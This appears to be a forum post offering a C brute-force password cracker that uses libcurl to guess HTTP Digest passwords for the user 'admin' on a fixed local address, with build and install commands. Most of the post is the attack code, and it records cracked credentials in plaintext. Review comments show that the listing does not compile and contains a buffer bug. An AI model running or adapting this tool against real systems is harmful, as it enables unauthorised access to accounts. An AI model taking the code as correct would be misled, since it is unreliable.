
Brute force password cracker

#include <stdlib.h>

#include <string.h>

#include <stdio.h>

#include <curl/curl.h>

 

// Forward declaration of the libcurl write callback; the definition follows main().
size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp) ;

 

/*
 * Tries candidate passwords for one fixed username against a single HTTP
 * endpoint using Digest authentication, one libcurl request per candidate.
 *
 * Candidates are built from `alphabet`, starting at `passwordLength`
 * characters, and advanced like an odometer with pwd[0] as the fastest
 * changing position. The run ends via exit(0) on the first HTTP 200.
 * Progress and results go to /var/tmp/bruteforce.
 *
 * Returns 0 when the loop ends or when curl_easy_init() fails.
 *
 * NOTE(review): as listed this block does not compile. `timer`, `tm_info`
 * and `buffer` are used but never declared here, and <time.h> is not among
 * the visible includes.
 *
 * NOTE(review): every wrong guess is answered with 401 for the same
 * username, and each request carries the literal header
 * "User-Agent:Unknown". Presumably that is the pattern server-side
 * lockout, rate limiting and log alerting would key on - confirm against
 * the target's logs.
 */
int main(void)

{

  CURL *curl;

  CURLcode res;

  long httpStatus ;

  int i ;

  char uid[256] ;

  char pwd[256] ;

  // ix[i] is the index into alphabet of the character currently at pwd[i]
  int  ix[256] ;

  char *alphabet ;

  int alphabetLength ;

  int passwordLength =6 ;

  int guess = 0 ;

  FILE *f ;

  struct curl_slist *hdrs ;

 

  // NOTE(review): timer, tm_info and buffer have no declaration in this listing
  time(&timer);

  tm_info = localtime(&timer);

 

  strftime(buffer, 25, "%Y-%m-%d %H:%M:%S", tm_info);

 

 

  strcpy( uid, "admin" ) ;  // Change this to any user name you know

 

  alphabet = "0123456789ABCDEF" ;    // define all possible chars in password here

  alphabetLength = strlen( alphabet) ;

 

// Log some stuff to file - Note file is overwritten by this call
// NOTE(review): the fopen() result is not checked, so a failed open passes
// NULL to setbuf()/fprintf(). The path is a fixed name in /var/tmp, and the
// file later receives the username and password in plaintext (see case 200).

  f = fopen( "/var/tmp/bruteforce", "w+" ) ;

  // Unbuffered stream: each fprintf() is handed to the OS immediately
  setbuf(f, NULL);

  fprintf( f, "Started at %s\n", buffer ) ;

  fprintf( f, "Alphabet: %s\n", alphabet ) ;

  fprintf( f, "Username: %s\n\n", uid ) ;

  // NOTE(review): fsync() takes an int file descriptor, not a FILE *, and
  // <unistd.h> is not included; fileno(f) would be the matching argument.
  fsync( f ) ;

 

  curl = curl_easy_init();

  if(curl) {

    // Start from an empty header list (0L is used as a null pointer here)
    hdrs = 0L ;

    hdrs = curl_slist_append(hdrs, "User-Agent:Unknown");

    // res is assigned here and after curl_easy_perform() but never inspected
    res = curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);

    // Hard-coded target: a private (RFC 1918) address over plain HTTP
    curl_easy_setopt(curl, CURLOPT_URL, "http://192.168.1.1:4567");

    // Include response headers in the data passed to the write callback.
    // NOTE(review): libcurl expects a long for this option (1L, not 1).
    curl_easy_setopt(curl, CURLOPT_HEADER, 1);

    curl_easy_setopt(curl, CURLOPT_HTTPAUTH, CURLAUTH_DIGEST);

    // write_data discards the response; only the status code is used below
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);

 

    for( i =0 ; i<256 ; i++ ) ix[i] = 0 ;

 

    // First candidate: passwordLength copies of alphabet[0]
    for( i=0 ; i<passwordLength ; i++ )

        pwd[i] = alphabet[0] ;

 

    pwd[passwordLength] = '\0' ;

 

    // Runs until the candidate string reaches 32 characters
    while( strlen(pwd)<32 )  {

        guess++ ;

        curl_easy_setopt(curl, CURLOPT_USERNAME, uid );

        curl_easy_setopt(curl, CURLOPT_PASSWORD, pwd );

 

        res = curl_easy_perform(curl);

 

        // NOTE(review): read regardless of res; after a transport failure
        // libcurl presumably reports 0 here, which lands in `default` below.
        curl_easy_getinfo( curl, CURLINFO_RESPONSE_CODE, &httpStatus ) ;

        switch( httpStatus ) {

        case 200 :

                // Credentials accepted: written in plaintext to the log and to stdout
                fprintf( f, "***************************\n" ) ;

                fprintf( f, "SUCCESS User: %s:%s\n", uid, pwd ) ;

                fprintf( f, "***************************\n" ) ;

                fprintf( stdout, "***************************\n" ) ;

                fprintf( stdout, "SUCCESS User: %s:%s\n", uid, pwd ) ;

                fprintf( stdout, "***************************\n" ) ;

                // Exits without curl_easy_cleanup(); the break below is unreachable
                exit( 0 ) ;

                break ;

        case 401:

                // Wrong guess: nothing is logged, move to the next candidate
                break ;

        default:

                // Any other status is logged together with the candidate that produced it
                fprintf( f, ">>>>> Err %ld, User: %s:%s\n", httpStatus, uid, pwd ) ;

                break ;

        }

        // Progress line every 10000 guesses
        if( (guess % 10000) == 0 ) {

                fprintf( f, "%s:%s\tErr: %ld\n", uid, pwd, httpStatus ) ;

                // NOTE(review): same FILE * / file-descriptor mismatch as the fsync() above
                fsync( f ) ;

        }

 

// count password in base(x)   [ x = alphabet Length ]
// NOTE(review): once the carry passes index passwordLength-1 it overwrites the
// '\0' at pwd[passwordLength] and nothing writes a new terminator. The bytes
// beyond it were never initialised, so the strlen(pwd) in the loop condition
// and the %s formatting then read indeterminate memory.

        for( i=0 ; i<256 ; i++ ) {

            ix[i]++ ;

            if( ix[i] >= alphabetLength ) {

                // This position wrapped: reset it and carry into the next one
                ix[i] = 0 ;

                pwd[i] = alphabet[0] ;

            } else {

                pwd[i] = alphabet[ix[i]] ;

                break ;

            }

        }

    }

    // NOTE(review): hdrs is never released with curl_slist_free_all() and f is never closed
    curl_easy_cleanup(curl);

  }

  return 0;

}

 

// Copied from example - thanks someone (sorry forgot your id)

/*
 * libcurl write callback that throws the received data away.
 *
 * Neither the data pointer nor the user pointer is read. The return value
 * is the full chunk size (size * nmemb), i.e. every byte is reported as
 * consumed.
 */
size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)
{
   const size_t consumed = size * nmemb;

   (void)buffer;
   (void)userp;

   return consumed;
}

 

 

While I am working to find out more - here's a brute force password guesser. Don't slam me for bad code, I just wanted something quick. I am sure you can find more if you need examples.

Alphabet = the set of characters to use in the guesses

User = the username whose password is being cracked

 

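This writes a brief status log to /var/tmp/bruteforce. The file is overwritten on each run, and a successful guess is recorded in it as plaintext username:password.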

There's a lot of opportunity to improve this - but I want to concentrate on the task at hand...

Build command

gcc bf.c -lcurl -o bf

 

If necessary libcurl can be sourced (debian) using:

apt-get install libcurl4-gnutls-dev

bf.c

@HenryOfBabylon

Henry (dot) Rawlinson at yandex & then dotcom
